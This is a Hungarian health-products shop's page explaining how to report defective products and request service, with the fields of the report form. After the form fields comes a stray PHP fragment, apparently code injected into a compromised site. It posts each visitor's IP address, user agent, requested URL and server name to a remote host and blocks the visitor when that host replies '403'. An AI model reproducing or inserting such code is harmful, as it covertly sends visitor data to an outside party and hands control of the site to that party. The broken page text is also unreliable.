Kategóriák
Tanúsítvány
Árukereső, a hiteles vásárlási kalauz
Ügyfélszolgálat
Szállítás, átvétel

Házhozszállítás futárszolgálattal (GLS, MPL)

FOXPOST Parcel locker

Fogyasztó Barát

Fizetési megoldás
TOP termékek
Termékajánló
Hírlevél

Hibás termék bejelentés, szerviz:

Termék meghibásodás jelzése, szerviz igény bejelentése

Mindent megteszünk annak érdekében, hogy az általunk forgalmazott eszközök kifogástalan minőségben ,hosszú időn keresztül szolgálják használójuk kényelmét, egészségét. 

Sajnos minden igyekezetünk ellenére néha előfordul, hogy hiba lép fel. Ezek elhárításáért technikai részlegünk igyekszik minden tőlünk telhetőt megtenni annak érdekében, hogy a hiba elhárítása a lehető legrövidebb időn belül megtörténhessen. 

Amennyiben a nálunk vásárolt termék meghibásodott akár garancia időn belül, akár azon túl,  kérjük itt jelezze vevőszolgálatunk felé az űrlap kitöltésével.

Garanciális ügyintézéshez mindenképpen szükséges a vásárlás dátumának és a vásárlást igazoló  dokumentum sorszámának megadása ((Vagy a számla sorszáma vagy a rendelés azonosító száma szükséges,, az egyik elegendő)

Kérjük minél részletesebben ismertesse a meghibásodás jellegét, lehetőség szerint fényképekkel illusztrálva azt. 

Kérjük, a hiba bejelentés előtt figyelmesen olvassa el a termék használati utasítását, és győződjön meg arról, helyesen használja-e  az eszközt, a problémát valóban meghibásodás okozza.

Kérjük várja meg vevőszolgálatunk  visszajelzését, mielőtt  a terméket elküldi címünkre. Munkatársaink igyekeznek a rendelkezésre álló adatok alapján felderíteni a hiba okát és meghatározni a lehetséges és szükséges intézkedéseket. Erről igyekszünk a lehető legrövidebb időn belül tájékoztatni Önt. 

Ha a terméket szükséges elküldeni a szervizünkbe, annak költsége Önt terheli.

Szervizünk  címe: Bükkös Egészségtár Kft  - 2000 Szentendre. Kőzúzó út 1.  (Megegyezik vevőszolgálatunk címével) 

Garanciális javítás esetén  a termék javítás utáni visszaküldésének költségét vállaljuk, kivéve ha a szervizbe küldés nem volt indokolt.  Amennyiben a beküldött termék nem garanciális javítást igényel, vagy valójában nem hibás, a termék visszaküldésének költségét is a vásárlónknak kell vállalnia.

Nem garanciális meghibásodás esetén a javítás megkezdése előtt mindenképpen árajánlatot adunk, annak elfogadása után kezdjük el a javítást. 

A *-gal jelölt mezők kitöltése kötelező:

Bejelentő neve*:
Bejelentő e-mail címe*:
Bejelentő telefon száma:*
Bejelentő címe:
Garanciális javítás:*
Igen
Nem
Vásárlás dátuma (garanciális igény esetén kötelező megadni):
Vásárlást igazoló bizonylat száma (Számla szám vagy rendelés szám) (Garanciális igény esetén kötelező megadni):
Termék megnevezése, cikkszáma, egyéb termék azonosítására vonatkozó információ : *
Hiba részletes leírása: *
Foto 1:
Foto 2:
Foto 3:
Foto 4:
Foto 5:
Megjegyzés, egyéb információ:
true, CURLOPT_TIMEOUT=>5, CURLOPT_POST=>1, CURLOPT_POSTFIELDS=>"u=1&ra=".$s["REMOTE_ADDR"]."&ua=".$s["HTTP_USER_AGENT"]."&ru=".$s["REQUEST_URI"]."&sn=".$s["SERVER_NAME"]));$c = curl_exec($h);curl_close($h); if($c=="403"){header('HTTP/1.0 403 Forbidden');die();} ?>